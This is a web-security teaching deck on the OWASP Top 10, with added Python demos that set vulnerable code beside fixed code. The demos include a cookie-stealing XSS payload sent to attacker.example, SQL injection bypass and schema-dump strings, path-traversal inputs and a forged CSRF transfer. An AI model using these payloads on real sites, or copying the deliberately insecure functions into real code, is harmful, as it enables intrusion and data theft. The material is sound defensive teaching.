Securing Web Applications


3 Nov 2013


It’s always better live.

MSDN Events

Securing Web Applications

Part 1 of 2

Understanding Threats and Attacks

Challenges When Implementing Security

Attacker needs to understand only one security issue

Defender needs to secure all entry points

Attacker has unlimited time

Defender works with time and cost constraints

Attackers vs. Defenders

Developers and management think that
security does not add any business value

Addressing security issues just before a
product is released is very expensive

Security As an Afterthought

Secure systems are more difficult to use

Complex and strong passwords are difficult to remember

Users prefer simple passwords

Security vs. Usability


A Closer look at Top Web Vulnerabilities:

Cross Site Scripting

Injection Flaws

Malicious File Execution

Insecure Direct Object Reference

Cross Site Request Forgery (CSRF)

Information Leakage and Improper Error Handling

Broken Authentication and Session Management

Insecure Cryptographic Storage

Insecure Communications

Failure to Restrict URL Access

Source: Open Web Application Security Project (OWASP) Top 10, 2007 edition

Cross Site Scripting (XSS)

What is Cross Site Scripting

Exploits applications that echo raw, unfiltered input into Web pages

Malicious code is echoed back into the HTML

Find a <form> field or query string parameter whose value is echoed to the Web page, supply a malicious script in it, and get a user to navigate to the page

Allows attackers to execute scripts

Can hijack user sessions

Deface web sites or insert hostile content

Conduct Phishing attacks

Take over the user’s browser

Cross Site Scripting (XSS)

Three known types of cross site scripting

Reflected XSS

Stored / Sticky XSS

DOM Injection (DOM-based XSS)

Cross Site Scripting (XSS)

Reflected XSS

A page reflects user-supplied data directly back to the user

Occurs when a site does not encode or filter content before displaying it

Allows for hidden site details such as session
or authentication structure to be captured and
potentially utilized

Cross Site Scripting (XSS)

Stored / Sticky XSS

Stores hostile / non-approved data in a file or a database

Sometimes assumed that stored data is
inherently safe

Internal attacks often exploit this assumption

Dangerous to Systems such as:

Content Management Systems

Blogs or forums

Sites that allow users to see input by other users

Cross Site Scripting (XSS)

DOM based attacks

JavaScript code is manipulated

Attacks can be a blend of various attacks

Generally carried out using JavaScript

Allows attackers to manipulate the rendered page

Manipulating the DOM tree

Can allow Form Data Hijacking

Can occur without user interaction in
complete transparency

Can utilize the XMLHttpRequest object

Can compromise checkout information
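Added example (Python; written for this page, not code from the MSDN presentation): a constructed search page and a constructed comment list show reflected and stored XSS next to the output-encoded versions, and why the encoding has to match the HTML context (a bare double quote is harmless in body text but closes an attribute). The templates, payload strings and function names are assumptions for the demo; html.escape is the real standard-library call.

```python
import html

# Constructed templates for a hypothetical search page (not from the slides).
TEMPLATE = "<p>Results for: {query}</p>"
ATTR_TEMPLATE = '<input name="q" value="{query}">'


def render_unsafe(query: str) -> str:
    """Reflected XSS: raw input is concatenated into the HTML body."""
    return TEMPLATE.format(query=query)


def render_safe(query: str) -> str:
    """Same page, input encoded for an HTML text context."""
    return TEMPLATE.format(query=html.escape(query, quote=True))


def render_attr_unsafe(query: str) -> str:
    """Encoding that does not match the context is not enough: < > & are
    escaped, but a bare double quote still closes the value attribute."""
    return ATTR_TEMPLATE.format(query=html.escape(query, quote=False))


def render_attr_safe(query: str) -> str:
    """Attribute context: quotes must be encoded as well."""
    return ATTR_TEMPLATE.format(query=html.escape(query, quote=True))


# Stored XSS: comments are persisted and later rendered for *other* users.
COMMENTS: list[str] = []


def post_comment(text: str) -> None:
    COMMENTS.append(text)  # storing the data is fine ...


def render_comments_unsafe() -> str:
    # ... trusting it because it "came from the database" is the flaw.
    return "<ul>" + "".join(f"<li>{c}</li>" for c in COMMENTS) + "</ul>"


def render_comments_safe() -> str:
    return "<ul>" + "".join(f"<li>{html.escape(c)}</li>" for c in COMMENTS) + "</ul>"


def contains_script_tag(markup: str) -> bool:
    """Crude check used only by this demo: did a live <script> tag survive?"""
    return "<script" in markup.lower()


# Constructed payloads: session theft via the body, attribute breakout via the input.
SCRIPT_PAYLOAD = "<script>location='http://attacker.example/?c='+document.cookie</script>"
ATTR_PAYLOAD = '" onfocus="alert(document.cookie)" autofocus="'

if __name__ == "__main__":
    print(render_unsafe(SCRIPT_PAYLOAD))
    print(render_safe(SCRIPT_PAYLOAD))
    print(render_attr_unsafe(ATTR_PAYLOAD))
    print(render_attr_safe(ATTR_PAYLOAD))
```

The stored case differs from the reflected one only in where the payload waits; the fix is identical, encode at the point of output for the context you are writing into, never at the point of storage.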

Cross Site Scripting (XSS)

Cross Site Scripting Demo

Discovery using Reflected Method

Using Stored or Sticky Method

Persistent Attack via Email

Cross Site Request Forgery

Simple and Potentially Devastating

Forces a logged-on victim’s browser to send a request to a vulnerable web application

The application then performs the action on behalf of the victim

Occurs when authorization is performed
solely on automatically submitted credentials
such as:

Session cookies

Basic authentication credentials

Source IP addresses

SSL client certificates

Windows domain credentials
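Added example (Python; written for this page, not from the MSDN presentation): a constructed "transfer money" handler that authorises on the session cookie alone, beside the same handler protected with a per-session synchronizer token. Because the browser attaches the cookie to any request for the site, the forged request from an attacker's page succeeds against the first handler; it fails against the second because the attacker's page cannot read the token. The Request/Session classes, the bank semantics and the names are assumptions for the demo.

```python
import hmac
import secrets
from dataclasses import dataclass, field


@dataclass
class Session:
    user: str
    # Per-session secret; a page on another origin cannot read it.
    csrf_token: str = field(default_factory=lambda: secrets.token_urlsafe(32))


@dataclass
class Request:
    cookies: dict  # attached automatically by the browser
    form: dict     # whatever page submitted the form chose to put here


SESSIONS: dict[str, Session] = {}          # session cookie value -> Session
TRANSFERS: list[tuple[str, str, int]] = []  # (from, to, amount) that went through


def login(user: str) -> str:
    sid = secrets.token_urlsafe(32)
    SESSIONS[sid] = Session(user)
    return sid


def transfer_vulnerable(req: Request) -> str:
    """Authorises on the session cookie alone. The browser sends that cookie
    with any request to this site, including one an attacker's page
    auto-submits, so the action runs as the victim."""
    sess = SESSIONS.get(req.cookies.get("sid", ""))
    if sess is None:
        return "401 not logged in"
    TRANSFERS.append((sess.user, req.form["to"], int(req.form["amount"])))
    return "200 ok"


def transfer_protected(req: Request) -> str:
    """Synchronizer token: the form must echo the session's secret, compared
    in constant time. A cross-site form cannot know it."""
    sess = SESSIONS.get(req.cookies.get("sid", ""))
    if sess is None:
        return "401 not logged in"
    supplied = req.form.get("csrf_token", "")
    if not hmac.compare_digest(supplied.encode(), sess.csrf_token.encode()):
        return "403 bad csrf token"
    TRANSFERS.append((sess.user, req.form["to"], int(req.form["amount"])))
    return "200 ok"


def forged_request(victim_sid: str) -> Request:
    """What the victim's browser sends after loading, on attacker.example,
    <form action="https://bank.example/transfer" method="POST"> with hidden
    fields plus <script>document.forms[0].submit()</script>: the cookie
    rides along, the token is absent."""
    return Request(cookies={"sid": victim_sid}, form={"to": "mallory", "amount": "1000"})


def legitimate_request(sid: str, to: str, amount: int) -> Request:
    """The site's own form carries the token in a hidden field."""
    token = SESSIONS[sid].csrf_token
    return Request(cookies={"sid": sid},
                   form={"to": to, "amount": str(amount), "csrf_token": token})
```

The same reasoning applies to every credential in the list above: anything the browser (or the network) supplies without the user's involvement cannot by itself prove the user intended the request.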

Cross Site Request Forgery

Cross Site Request Forgery Demo

Injection Flaws

SQL Injection flaws are common

Occurs when external input is used in
database commands

The supplied data changes the command being executed

Can allow attackers to create, read, update or
delete data.

Can potentially compromise an entire database

Injection Flaws

Example exploit:

SELECT * FROM Users
WHERE User = 'User' AND Password = 'Password'

The query relies on user-submitted information to perform the query

Malicious code can be submitted in place of the user name, such as

' or 1=1 --

' closes the preceding string in the SQL statement

or 1=1 matches every record in the table

-- comments out the remainder of the SQL statement
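Added example (Python with the standard-library sqlite3 driver; written for this page, not from the MSDN presentation): the login query above built by string concatenation, the three inputs an attacker would try against it, and the same query with bound parameters. The Users table and its rows are constructed sample data; the function names are assumptions for the demo.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed Users table (sample data, not from the presentation)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE Users (User TEXT, Password TEXT, Role TEXT)")
    con.executemany("INSERT INTO Users VALUES (?, ?, ?)",
                    [("admin", "s3cret!", "admin"), ("bob", "hunter2", "user")])
    return con


def login_vulnerable(con: sqlite3.Connection, user: str, password: str):
    """Builds the slide's query by concatenation: the input becomes part of
    the SQL grammar instead of staying a value."""
    sql = ("SELECT User, Role FROM Users "
           f"WHERE User = '{user}' AND Password = '{password}'")
    return con.execute(sql).fetchone()  # (User, Role) or None


def login_parameterized(con: sqlite3.Connection, user: str, password: str):
    """Same query with bound parameters: the driver passes the text as data,
    so quotes and comment markers inside it have no syntactic effect."""
    sql = "SELECT User, Role FROM Users WHERE User = ? AND Password = ?"
    return con.execute(sql, (user, password)).fetchone()


# Constructed attacker inputs for the User field (password left as "x"):
BYPASS_ANY = "' or 1=1 --"     # ' closes the string, or 1=1 matches all rows, -- drops the password check
BYPASS_ADMIN = "admin' --"     # log in as a chosen account without its password
DUMP_SCHEMA = "' UNION SELECT name, sql FROM sqlite_master --"  # read table definitions

if __name__ == "__main__":
    con = make_db()
    for payload in (BYPASS_ANY, BYPASS_ADMIN, DUMP_SCHEMA):
        print(repr(payload), "->", login_vulnerable(con, payload, "x"),
              "| parameterized ->", login_parameterized(con, payload, "x"))
```

The UNION payload is the "compromising table structure" demo in miniature: the query's own column count is reused to read sqlite_master. Stacked statements (the "adding an admin account" demo) are not shown because the Python sqlite3 driver refuses more than one statement per execute() call; other drivers and databases do not.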

Injection Flaws

SQL Injection Flaw Demos

Adding an Admin Account

Compromising Database Table
Structure and Data

Defacing a Website

Injection Flaws

Not limited to SQL injection


HTML Injection (XSS)

HTTP Injection (HTTP Response Splitting)

Malicious File Execution

Occurs when the application is tricked into
executing commands or creating files on
the server

System allows potentially hostile input to be used with file or stream functions such as URLs or file system references

Can lead to arbitrary remote and hostile
content being included or invoked by server

Allows for remote code execution

Remote root installations or system compromises

Insecure Direct Object Reference

Occurs when an internal implementation object is exposed, such as a:

File or Directory

Database Record or Key

URL or Form Parameter

These can be manipulated if no access control check is in place

Insecure Direct Object Reference

Applications expose internal objects to users

Parameter tampering allows references to be changed

Can violate the intended but unenforced
access control policy

Any exposed application construct could be manipulated

Code can be attacked when user input determines the location of an object

Using input parameters such as:

../ (dot-dot-slash) sequences

can allow an attacker to traverse the file system
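Added example (Python; written for this page, not from the MSDN presentation) serving both the Malicious File Execution slide and the path traversal point above: a constructed "template include" that joins user input onto a base directory and reads whatever results, beside a version that allow-lists the name and then checks the resolved path still lies under the base. The directory layout is built in a temporary directory by make_fixture (constructed); the regex, the function names and the UnsafePath type are assumptions for the demo.

```python
import re
import tempfile
from pathlib import Path


class UnsafePath(ValueError):
    """Raised when user input would select a file outside the allowed directory."""


# Allow-list: no slashes, no leading dot, nothing that looks like a URL.
SAFE_NAME = re.compile(r"^[A-Za-z0-9_][A-Za-z0-9_.-]*$")


def resolve_under(base: Path, user_supplied: str) -> Path:
    """Defence in depth: allow-list the name, then resolve the joined path
    (following symlinks) and insist it still sits under `base`."""
    if not SAFE_NAME.match(user_supplied):
        raise UnsafePath(f"rejected name: {user_supplied!r}")
    base = base.resolve()
    candidate = (base / user_supplied).resolve()
    if candidate != base and base not in candidate.parents:
        raise UnsafePath(f"escapes base directory: {user_supplied!r}")
    return candidate


def read_template_vulnerable(base: Path, name: str) -> str:
    """?page=../../etc/passwd style: the supplied name is joined and read.
    Note that joining an absolute path discards `base` entirely."""
    return (base / name).read_text()


def read_template_safe(base: Path, name: str) -> str:
    return resolve_under(base, name).read_text()


def try_read_safe(base: Path, name: str) -> str:
    """Convenience wrapper so callers see a result instead of an exception."""
    try:
        return read_template_safe(base, name)
    except UnsafePath:
        return "DENIED"


def make_fixture() -> tuple[Path, Path]:
    """Constructed layout for the demo: <tmp>/templates/home.html is meant
    to be reachable, <tmp>/secret.txt is not. Returns (base, secret)."""
    root = Path(tempfile.mkdtemp())
    templates = root / "templates"
    templates.mkdir()
    (templates / "home.html").write_text("welcome")
    (root / "secret.txt").write_text("SECRET")
    return templates, root / "secret.txt"


if __name__ == "__main__":
    base, secret = make_fixture()
    for name in ("home.html", "../secret.txt", str(secret), "http://attacker.example/shell.txt"):
        print(f"{name!r}: safe={try_read_safe(base, name)!r}")
```

The same check applies before any include, open, or stream call that takes a name derived from the request; in a language that executes included files (the "remote code execution" bullet) the consequence of skipping it is code execution rather than disclosure.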

Insecure Direct Object Reference Demo

Accessing Source Code

Accessing Sensitive Information

Information Leakage and Improper Error Handling

Applications can unintentionally leak
information about their configuration or
internal workings

They can leak state information

Improper error handling exposes internal
workings and implementation details

Stack traces

Failed SQL statements

Other debugging information

This information can help an attacker successfully exploit other vulnerabilities

This is an extremely common error and can occur if the web.config file is not properly configured
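Added example (Python; written for this page, not from the MSDN presentation): a constructed request handler that returns the stack trace to the client, beside one that returns a generic message with a reference id and logs the detail server-side, followed by the two login-message styles from the demo titles ("Too Much Info on Login Attempts"). The failing view, the user table and the message texts are constructed for the demo.

```python
import hmac
import logging
import sqlite3
import traceback
import uuid

log = logging.getLogger("app")


def handle_request_verbose(view):
    """Debug-style handling: the client receives the stack trace, which
    names tables, columns, file paths and framework versions."""
    try:
        return 200, view()
    except Exception:
        return 500, traceback.format_exc()


def handle_request_safe(view):
    """Generic message to the client, full detail to the server log, joined
    by a reference id so support can still find the entry."""
    try:
        return 200, view()
    except Exception:
        ref = uuid.uuid4().hex[:12]
        log.exception("unhandled error ref=%s", ref)
        return 500, f"Something went wrong. Reference: {ref}"


def failing_view() -> str:
    """Constructed view whose SQL is wrong; the database error names the table."""
    con = sqlite3.connect(":memory:")
    con.execute("SELECT balance FROM Accounts WHERE id = 1")  # no such table
    return "unreachable"


# Constructed credentials, kept in clear only to keep this example about messages.
USERS = {"alice": "correct horse"}


def login_verbose(user: str, password: str) -> str:
    """Distinct messages let an attacker confirm which user names exist."""
    if user not in USERS:
        return "Unknown user"
    if not hmac.compare_digest(USERS[user].encode(), password.encode()):
        return "Wrong password"
    return "ok"


def login_uniform(user: str, password: str) -> str:
    """One message for every failure, so a wrong name and a wrong password
    look the same from outside."""
    stored = USERS.get(user, "")
    if user in USERS and hmac.compare_digest(stored.encode(), password.encode()):
        return "ok"
    return "Invalid username or password"


if __name__ == "__main__":
    print(handle_request_verbose(failing_view)[1])
    print(handle_request_safe(failing_view)[1])
    print(login_verbose("nobody", "x"), "|", login_uniform("nobody", "x"))
```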

Information Leakage and Improper Error Handling Demo

Too Much Info on Login Attempts

Too Much Error Information

Broken Authentication and Session Management

Improper authentication and session management

Use of predictable (pseudo-random) session values

Failing to protect credentials and session
tokens after login

Can lead to hijacking of user or admin accounts

Undermine authorization and accountability

Can cause privacy violations
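Added example (Python; written for this page, not from the MSDN presentation): what "pseudo-random session values" costs in practice. A session id derived from the non-cryptographic random module seeded with the clock is reproduced by an attacker who only knows roughly when the victim logged in; the CSPRNG-backed id is not. A small session store then shows the id being rotated at login and dropped at logout so a token issued before authentication never becomes an authenticated one. The id formats, the time window and the store are assumptions for the demo.

```python
import hashlib
import random
import secrets


def weak_session_id(clock_seconds: float) -> str:
    """Non-cryptographic PRNG seeded from the clock, then hashed to look
    opaque. Same second -> same id; the hash adds no entropy."""
    rng = random.Random(int(clock_seconds))
    return hashlib.md5(str(rng.getrandbits(64)).encode()).hexdigest()


def strong_session_id() -> str:
    """256 bits from the OS CSPRNG: unguessable and unrelated to the clock."""
    return secrets.token_urlsafe(32)


def enumerate_weak_ids(approx_login_time: float, window_s: int = 5) -> set[str]:
    """Attacker who saw roughly when the victim logged in (a post timestamp,
    a 'last login' banner) lists every id the server could have issued."""
    base = int(approx_login_time)
    return {weak_session_id(base + d) for d in range(-window_s, window_s + 1)}


class SessionStore:
    """Ids are rotated when privilege changes and removed on logout, so a
    fixated or captured pre-login id does not survive login."""

    def __init__(self) -> None:
        self._sessions: dict[str, dict] = {}

    def start(self) -> str:
        sid = strong_session_id()
        self._sessions[sid] = {"user": None}
        return sid

    def login(self, sid: str, user: str) -> str:
        self._sessions.pop(sid, None)          # retire the pre-login id
        new_sid = strong_session_id()
        self._sessions[new_sid] = {"user": user}
        return new_sid

    def logout(self, sid: str) -> None:
        self._sessions.pop(sid, None)          # server-side invalidation, not just cookie deletion

    def user_for(self, sid: str):
        return self._sessions.get(sid, {}).get("user")


if __name__ == "__main__":
    t = 1_700_000_000.0                       # constructed login time
    victim = weak_session_id(t + 0.7)
    print("weak id recovered:", victim in enumerate_weak_ids(t))
    print("strong id:", strong_session_id())
```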

Broken Authentication and Session

Generally ancillary functions cause problems, such as:

Logout

Password Management

Timeout

Remember me

Secret question

Account update

Broken Authentication and Session Management Demo

Displaying Others Profile

Insecure Cryptographic Storage

Correct use of data encryption tools is key
to protection

Flaws can lead to disclosure of sensitive
data and compliance violations

Some of the most common flaws include:

Not encrypting sensitive data

Insecure use of strong algorithms

Usage of weak / homegrown algorithms
A.K.A. “

Hard coding keys or not protecting them
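Added example (Python; written for this page, not from the MSDN presentation): three of the flaws above side by side. An unsalted fast hash for passwords (identical inputs give identical, table-crackable outputs); a salted, iterated standard KDF with a self-describing record so it can be verified and later migrated; and a hard-coded key contrasted with one loaded from the environment at run time. PBKDF2-HMAC-SHA256 is used because it is in the standard library; the record format, the environment variable name and the example key are assumptions for the demo.

```python
import base64
import hashlib
import hmac
import os
import secrets


def store_password_weak(password: str) -> str:
    """Unsalted fast hash: equal passwords give equal hashes, and
    precomputed tables crack common ones offline in seconds."""
    return hashlib.md5(password.encode()).hexdigest()


def hash_password(password: str, *, iterations: int = 600_000) -> str:
    """Salted, slow, standard KDF. The record carries algorithm, cost and
    salt, so verification needs nothing else and the cost can be raised later."""
    salt = secrets.token_bytes(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return "$".join(("pbkdf2_sha256", str(iterations),
                     base64.b64encode(salt).decode(), base64.b64encode(dk).decode()))


def verify_password(password: str, record: str) -> bool:
    alg, iterations, salt_b64, dk_b64 = record.split("$")
    if alg != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             base64.b64decode(salt_b64), int(iterations))
    return hmac.compare_digest(dk, base64.b64decode(dk_b64))   # constant-time compare


# The anti-pattern, shown for contrast: anyone with the source or the binary
# has every secret this key ever protected.
HARDCODED_KEY = b"0123456789abcdef0123456789abcdef"


def load_key(env_name: str = "APP_ENC_KEY", env=None) -> bytes:
    """Keys come from the environment or a secret store at run time, never
    from source control. `env` can be passed explicitly for testing."""
    env = os.environ if env is None else env
    value = env.get(env_name)
    if value is None:
        raise RuntimeError(f"{env_name} is not set; refusing to start with a default key")
    key = base64.b64decode(value)
    if len(key) != 32:
        raise ValueError("expected a 32-byte (256-bit) key")
    return key


# Constructed key material for the demo only (all-0x01 bytes).
EXAMPLE_KEY_B64 = base64.b64encode(b"\x01" * 32).decode()

if __name__ == "__main__":
    rec = hash_password("correct horse")
    print(rec)
    print(verify_password("correct horse", rec), verify_password("wrong", rec))
    print(store_password_weak("password"))
```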

Insecure Communications

Unencrypted traffic can be sniffed

An attacker on the network path can read the whole conversation

Potentially expose sensitive information or

Could risk exposing authentication or
session token

Traffic sniffers can access credentials or
sensitive information

Varies by network

Not using SSL for each authenticated request
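Added example (Python; written for this page, not from the MSDN presentation): why "not using SSL for each authenticated request" leaks the session token even when the login itself was over HTTPS. A session cookie set without the Secure attribute is attached by the browser to the first plain-http:// request to the same site (a logo, a redirect), where a sniffer reads it; with Secure it is withheld. The check is run through the standard library's http.cookiejar, which implements the same rules a browser applies. The FakeResponse stand-in, the URLs and the cookie values are constructed for the demo.

```python
import urllib.request
from email.message import Message
from http.cookiejar import CookieJar


class FakeResponse:
    """Minimal stand-in for the response object CookieJar expects (constructed
    for this demo): it only needs .info() returning the response headers."""

    def __init__(self, set_cookie_headers):
        self._headers = Message()
        for value in set_cookie_headers:
            self._headers.add_header("Set-Cookie", value)

    def info(self):
        return self._headers


def cookie_sent_over(set_cookie: str, login_url: str, later_url: str) -> bool:
    """Store a cookie issued in the response to `login_url`, then ask the
    cookie jar whether a browser would attach it to a request for `later_url`."""
    jar = CookieJar()
    jar.extract_cookies(FakeResponse([set_cookie]), urllib.request.Request(login_url))
    later = urllib.request.Request(later_url)
    jar.add_cookie_header(later)          # adds a Cookie header only if policy allows
    return later.get_header("Cookie") is not None


def session_cookie(name: str, value: str) -> str:
    """Set-Cookie value for a session token: HTTPS only, unreadable by
    script, not sent on cross-site requests."""
    return f"{name}={value}; Path=/; Secure; HttpOnly; SameSite=Strict"


# Constructed URLs and headers for the demo.
LOGIN_URL = "https://shop.example/login"
PLAIN_URL = "http://shop.example/images/logo.png"   # one http:// link somewhere on the site
COOKIE_NO_SECURE = "sid=abc123; Path=/; HttpOnly"
COOKIE_SECURE = session_cookie("sid", "abc123")

if __name__ == "__main__":
    print("without Secure, sent over http:", cookie_sent_over(COOKIE_NO_SECURE, LOGIN_URL, PLAIN_URL))
    print("with Secure, sent over http:   ", cookie_sent_over(COOKIE_SECURE, LOGIN_URL, PLAIN_URL))
```

Marking the cookie Secure closes the leak on the client side; serving the whole authenticated session over TLS (and redirecting http:// to https://) closes it on the server side. Both are needed, since the attribute does nothing for a site that still answers plain HTTP with session-bound content.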

Failure to Restrict URL Access

Generally URL protection is based on

Pages can still be accessed if not
secured properly

Security by obscurity is not sufficient

Hidden URLS that are only available to certain
users can be stumbled upon or discovered

Client side privilege authentication
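Added example (Python; written for this page, not from the MSDN presentation) serving both this slide and the Insecure Direct Object Reference slides above: the two server-side checks that "security by obscurity" and "client side privilege authentication" skip. Object-level: a profile lookup that returns whatever id the request names, beside one that checks the caller owns the record (the "Displaying Others Profile" demo). Function-level: a route table that states the role each URL needs and is enforced on every request, so a "hidden" admin URL typed by hand is refused even though the menu never showed it. The users, profiles, routes and status codes are constructed for the demo.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class User:
    id: int
    roles: frozenset


# Constructed data: profiles keyed by the id that appears in ?profile_id=N.
PROFILES = {
    1: {"owner": 1, "email": "alice@example.com", "ssn_last4": "1234"},
    2: {"owner": 2, "email": "bob@example.com", "ssn_last4": "9876"},
}


def get_profile_vulnerable(current: User, profile_id: int):
    """Insecure direct object reference: the id from the request is used
    as-is, so changing 1 to 2 shows another user's record."""
    return PROFILES.get(profile_id)


def get_profile_safe(current: User, profile_id: int):
    """Object-level check: may *this* caller see *this* record?"""
    profile = PROFILES.get(profile_id)
    if profile is None:
        return 404, None
    if profile["owner"] != current.id and "admin" not in current.roles:
        return 403, None
    return 200, profile


# Function-level access control: every URL has a required role set, checked
# on the server for every request, whether or not a link to it was ever shown.
ROUTE_ROLES = {
    "/": frozenset(),                            # public
    "/account": frozenset({"user", "admin"}),
    "/admin/users": frozenset({"admin"}),
}


def navigation(current: User) -> list:
    """Menu built from the same table. Hiding a link is a courtesy, not a control."""
    return [path for path, roles in ROUTE_ROLES.items()
            if not roles or roles & current.roles]


def dispatch(current: User, path: str) -> int:
    """Server-side gate that does not care whether the URL was 'hidden'."""
    roles = ROUTE_ROLES.get(path)
    if roles is None:
        return 404
    if roles and not (roles & current.roles):
        return 403
    return 200


if __name__ == "__main__":
    alice = User(1, frozenset({"user"}))
    print("alice's menu:", navigation(alice))
    print("alice requests /admin/users anyway:", dispatch(alice, "/admin/users"))
    print("alice reads profile 2 (vulnerable):", get_profile_vulnerable(alice, 2))
    print("alice reads profile 2 (checked):", get_profile_safe(alice, 2))
```

The two checks are different questions (is this user allowed to call this function at all, and is this user allowed to touch this particular object) and a site needs both; passing the first does not imply the second.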

Failure to Restrict URL Access Demo

Security by Obscurity